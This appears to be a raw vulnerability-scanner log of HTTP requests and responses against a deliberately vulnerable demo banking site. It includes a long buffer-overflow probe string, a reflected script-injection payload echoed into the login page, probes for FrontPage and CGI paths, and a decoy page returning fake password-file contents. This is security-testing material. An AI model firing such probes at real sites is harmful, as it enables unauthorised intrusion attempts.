aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">BufferOverflow Link</A>
</P> </BODY>
</HTML>GET /banklogin.asp?err=--><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>--><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /join1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Location: join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please+fill+in+your+name
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /_vti_pvt/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:46:35 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /_vti_cnf/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_cnf/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:32:53 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT
ETag: "ac14c2f8a9dc11:8f6"
Content-Length: 18
bleh exploit :0:0:GET /rootlogin.old HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:58 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:20 GMT
ETag: "241b8c2a8dc11:8f6"
Content-Length: 1351
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occured"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
GET /banklogin.asp?err=Invalid%20Login%3A HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4929
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login:<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
